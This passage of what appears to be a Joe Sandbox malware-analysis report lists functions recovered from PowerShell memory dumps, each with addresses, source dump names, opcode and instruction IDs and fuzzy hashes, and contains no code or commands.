                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1766311117207c12fca37f1ce1154d6f078589cec4c524b3571e62f5e486e4bd
                                                                                                                                                                                                                                • Instruction ID: 2374b2513b259e7a3af32a9293d330906da26c7b5a716115b603cced756e0960
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1766311117207c12fca37f1ce1154d6f078589cec4c524b3571e62f5e486e4bd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85319AB0E057548EEB60CF6AC1883CABFF2EF89324F28901DD4499B216D674A4858B61
                                                                                                                                                                                                                                Function 04D2F094 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2536982637.0000000004D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D2D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4d2d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d8839e70562105489a67394dbc81f13ca4b9ed5a5a57b98859d0317bef025a28
                                                                                                                                                                                                                                • Instruction ID: f7e3d03819abaff7d65ed033cf0b5d700c7c0af9e90fece786eef390d7b4ec40
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8839e70562105489a67394dbc81f13ca4b9ed5a5a57b98859d0317bef025a28
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48212275600200DFDB05DF14CBC0B26BBB5FB98718F20C9ADD9495B256C336E846DA61
                                                                                                                                                                                                                                Function 04E294D0 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 22ecfe4fd5263b97422128e7652fa218a7e459e6e0892fdb800ff6019ca9e3b5
                                                                                                                                                                                                                                • Instruction ID: 6fefe4a2005906bebe8a607899e35d4ece2211fd04c6650b15610f8cdc101178
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22ecfe4fd5263b97422128e7652fa218a7e459e6e0892fdb800ff6019ca9e3b5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 182159B0E057448BEB60CF6AC58838AFFF2EB89324F28D01DD85D97216D67464858B61
                                                                                                                                                                                                                                Function 07D41AAC Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 721f66cfc5a16764c353594529244160c54f2476be2d943b076a8cd35b99b825
                                                                                                                                                                                                                                • Instruction ID: 76ebb7fbd923224f04d8c079c85abd48d7fed822b63db4fcde97f9f51756993d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 721f66cfc5a16764c353594529244160c54f2476be2d943b076a8cd35b99b825
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA11A2B1A0434ECFDB208FA9C444A69FFF0EF46211F0481A6D554DB211E332D8C5CBA2
                                                                                                                                                                                                                                Function 04E2773C Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ad98728600f9d8448103d7189e5aeff568f50b1d8145e71c53ae46a4a569020a
                                                                                                                                                                                                                                • Instruction ID: dafb1bd6fd85784d749112ebb021da153f0b5bbf28c37023ec21b6111926b248
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad98728600f9d8448103d7189e5aeff568f50b1d8145e71c53ae46a4a569020a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C811003A7001288FDB14DB68D9409ED77F6FFCC219B0140A5E909EB315DB35ED158BA0
                                                                                                                                                                                                                                Function 04E22C5C Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 017c028144c596c2190c1b5c3542677694d87ac8b8f7f6491d43ca893b7c0752
                                                                                                                                                                                                                                • Instruction ID: b2f092c2560549da04bc4281fb60d4892a055041b4a890ed6d662efda1f60ea9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 017c028144c596c2190c1b5c3542677694d87ac8b8f7f6491d43ca893b7c0752
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3511C8356096949FCB07DF68C9A05E8BF70EF4A314B1541D7D490AB2A3C236EC15CB61
                                                                                                                                                                                                                                Function 07D41AC0 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 90c64ef5f6f8dd00eaebfe18e72567230d68ae294ae70730f9b0ee69b712dcd9
                                                                                                                                                                                                                                • Instruction ID: ddc254518c5bc0c0e477e289f171dfcf5507e9338397e7d6631c8bf5da61839e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90c64ef5f6f8dd00eaebfe18e72567230d68ae294ae70730f9b0ee69b712dcd9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE116DB1A0020EDFDB20CF99C545A6AFFE1EB46351F0481A6D95887211E732D984CBA2
                                                                                                                                                                                                                                Function 07D42A18 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5aeafdb67952941e4160b47b84f4d8024a3b590ae97ba5c4d8a6d3b58452a905
                                                                                                                                                                                                                                • Instruction ID: fbaa2b88941d87599baa682d3622f342ffd5d7e7ce97002c4ff6ef62fc6d4af7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5aeafdb67952941e4160b47b84f4d8024a3b590ae97ba5c4d8a6d3b58452a905
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E11160B2A00206DFDB24CE59CA41A66FBE1FF49321F0481A6E90487215D731F984CBA2
                                                                                                                                                                                                                                Function 04D2F43B Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2536982637.0000000004D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D2D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4d2d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                                                                                                                • Instruction ID: 8e4b71d6a677415348d435422d07dc3a58d14fd5350cad547cd6486acfeb3efb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E218E76504240DFCB06CF10DAC4B16BF71FB58318F24C6ADD9094A256C336D45ADB91
                                                                                                                                                                                                                                Function 04E2E220 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 19b0e10b16abc8049ff768938e2c26f00a6770688648b999edfa86c833ce7be0
                                                                                                                                                                                                                                • Instruction ID: 6dbf724e5dd3d3f8237649c660dda025017ec2fd57922db8aa9ec5c9318b74a1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19b0e10b16abc8049ff768938e2c26f00a6770688648b999edfa86c833ce7be0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78116D397052208FCB12DF68D854AAABBF1FB89315B1445ADE50ADB352C731A802CB90
                                                                                                                                                                                                                                Function 04D2F08F Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2536982637.0000000004D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D2D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4d2d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                                                                                                                                • Instruction ID: add8fa49bb21e0e2e1cf2fd95e0e9a214a74227553709ff9395702c5de07b24c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F211DD75504280CFDB06CF10CAC4B16BFB1FB84318F28CAAED8494B656C33AE44ADB61
                                                                                                                                                                                                                                Function 04E2BDB0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a0e1693dd26687ce85d684c0f7b5ce8eea76ed93eb8b922d4bdbd19e06ea0fae
                                                                                                                                                                                                                                • Instruction ID: 037cb7126f7da212cfc95f336d8192802ea28267635c394bf38604f6ad48690c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0e1693dd26687ce85d684c0f7b5ce8eea76ed93eb8b922d4bdbd19e06ea0fae
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C01B1316047149FD728CF7AD984B9ABBE1EF49254F2488ADD49EC76A1DB30F842CB00
                                                                                                                                                                                                                                Function 04E2E1A0 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: dea12f7ae00b107bc1cea5e5315400f2fb30fd98e028bea10d02bda40395e21e
                                                                                                                                                                                                                                • Instruction ID: 9be1a163fe255bbad254959f94876c100b3732c36fb4cbf4d1365e0a2f6f147f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dea12f7ae00b107bc1cea5e5315400f2fb30fd98e028bea10d02bda40395e21e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC019235B042149FCB11AFB4E808AAEBBF5FB88315F00406DE50AD3242DB316901CB91
                                                                                                                                                                                                                                Function 04E2DF18 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d74daf873df2a0d43080c437a3e646826ff315fbbe218bac38d711b1cb03f151
                                                                                                                                                                                                                                • Instruction ID: 40c84ecbc838a0116701b1fc070d9eece08c3d25573435a2aa366b8a27ea061e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d74daf873df2a0d43080c437a3e646826ff315fbbe218bac38d711b1cb03f151
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5110534204750CFC768DF75D49085ABBF6EF8921972489ADD48A8BBA0DB32F846CB50
                                                                                                                                                                                                                                Function 04D2D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2536982637.0000000004D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D2D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4d2d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 84d9f0ef920bba212b21e84d722335d0a8e8928670adbe4afe2c5d8143390042
                                                                                                                                                                                                                                • Instruction ID: 7162227e48217498face527baca45fb215f004594c7a854a03c48b535e15218b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84d9f0ef920bba212b21e84d722335d0a8e8928670adbe4afe2c5d8143390042
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D012B312083149AE7104E25DF84767BFD8EF51328F18C429ED484B156C279E841C6B1
                                                                                                                                                                                                                                Function 04D2D005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2536982637.0000000004D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D2D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4d2d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4282b677b37edfa8da980aaa14980a14fb57dfc079eab308ea9b0494c0ea5fb5
                                                                                                                                                                                                                                • Instruction ID: 4ac0c7d25b8cfb7553894a9040e0db5d9e48e81cf1b2fad107bb3fb3dae807d1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4282b677b37edfa8da980aaa14980a14fb57dfc079eab308ea9b0494c0ea5fb5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A01526110E3D05ED7128B259D94752BFB4EF53228F1DC0DBD9888F1A3C2695849C772
                                                                                                                                                                                                                                Function 04E2BFE1 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d2c8379583103739cd5f6d8a3232437e3afaf6deb0980f0cab2ca818e7ccea81
                                                                                                                                                                                                                                • Instruction ID: 8def8c59ba20a83a2533153a10f93bf318b71e35cb5066251083628f725914c6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2c8379583103739cd5f6d8a3232437e3afaf6deb0980f0cab2ca818e7ccea81
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0F062367093A05FD7118A799C549BBBFE9EF8662170941ABF584CB3A2CA70CD04C7A0
                                                                                                                                                                                                                                Function 04D2D9A7 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2536982637.0000000004D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D2D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4d2d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3172a40b2b03b869f0e3b01834a82d0384358cc652419fb0d3e426504de502e7
                                                                                                                                                                                                                                • Instruction ID: 8f40c3b36e3698bd196e5613eb927c9ff63a8aaa49d6f8f787ad7160670ed107
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3172a40b2b03b869f0e3b01834a82d0384358cc652419fb0d3e426504de502e7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24F0F976200614AF97208F0AD985C23FBEDEBD5774719C55AE84A4B611C672FC41CEA0
                                                                                                                                                                                                                                Function 04E27A18 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: b039eeb36dfba2be39ddccbd599de68ea67a9e68ecc0b85918723210074022ac
                                                                                                                                                                                                                                • Instruction ID: bd17d953a5ebebbc6e881414318594ac609e1f047a9fdb937fa2b69d4ea4ad48
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b039eeb36dfba2be39ddccbd599de68ea67a9e68ecc0b85918723210074022ac
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85F024717047109FCB119B69DC44A6F7BE9EB89265B00062EE50AC7351DA34AC0187B4
                                                                                                                                                                                                                                Function 04E291A9 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 373efd65fb5f6666af9c7047e722fa599087d0145a9d0b6d81d4a77015739fb6
                                                                                                                                                                                                                                • Instruction ID: bd2e1c1e5514ae4ab895ea47bd293645b998700006fc3ef55c5d656886431773
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 373efd65fb5f6666af9c7047e722fa599087d0145a9d0b6d81d4a77015739fb6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02F0C2356046044BE710AB78D0557EB7BA2EFC432CF14826DC84A47385CE393806CBA1
                                                                                                                                                                                                                                Function 04E2E140 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a340fa074cf5f2e9f97a34ee634377b88a3ff997ef25f8e15b0c6510a61d0a16
                                                                                                                                                                                                                                • Instruction ID: a009a2168b108eff27f5f310f0b36de0358eec8d0c21fc9f5794ac3fe6783ba7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a340fa074cf5f2e9f97a34ee634377b88a3ff997ef25f8e15b0c6510a61d0a16
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66F05E347041618FC3119F2DD89486ABBF5AFCA71531911EAE485DB372CA60DC118B90
                                                                                                                                                                                                                                Function 04D2D998 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2536982637.0000000004D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D2D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4d2d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e2fb3399e9b04ca5b6044baeb5852a60e7e2e50ff232e362475b5c0380c69c3c
                                                                                                                                                                                                                                • Instruction ID: 693274a3480dba210f08cb314adb771988ce57d06c362d2336bc4bffe24f8c08
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2fb3399e9b04ca5b6044baeb5852a60e7e2e50ff232e362475b5c0380c69c3c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FF0F976100650AFD725CF06CD85D23BBBAEB95624B198499F85A5B312C631FC42CFA0
                                                                                                                                                                                                                                Function 04E27A28 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: efd61a451cc523e105488437e85e6708f59f39ef12be2a66146f7b60ae1303a7
                                                                                                                                                                                                                                • Instruction ID: e389c6e636a6f110d627e8fd598972206b6ece37c9dff555b30b3ba3f5988bd2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efd61a451cc523e105488437e85e6708f59f39ef12be2a66146f7b60ae1303a7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21F0A0327007249FDB109B6AD944E6FBBEAEB88275B00062EE50AC7750DF71AD4587B4
                                                                                                                                                                                                                                Function 04E27757 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 2d8ec86aed6f929c31699723db3f1fc7c105ce59f8d1ca18028bd18e8c40b2f6
                                                                                                                                                                                                                                • Instruction ID: a80062320c43c72d5a74eb5f0b846ee5f1856fa6353aa5e11d09190a7d5d32bb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d8ec86aed6f929c31699723db3f1fc7c105ce59f8d1ca18028bd18e8c40b2f6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAF065397001288FDB10DB6CDA40AA97BE6EFC875A71541A5E909DB325DF35EC068BE0
                                                                                                                                                                                                                                Function 04E291B8 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 65e2587c2cb73bbbf1a430e3db104051f207313a10f8990773855c3b73e751de
                                                                                                                                                                                                                                • Instruction ID: a11a78f873502a565e110e402203f0c505df3308808ac30e3b8a3040a2328e7a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65e2587c2cb73bbbf1a430e3db104051f207313a10f8990773855c3b73e751de
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10F0EC757046184BE300BBB8C0193AB77A6EBC032CF10816AC90A4B384CE3E3802CBF1
                                                                                                                                                                                                                                Function 04E2DF90 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
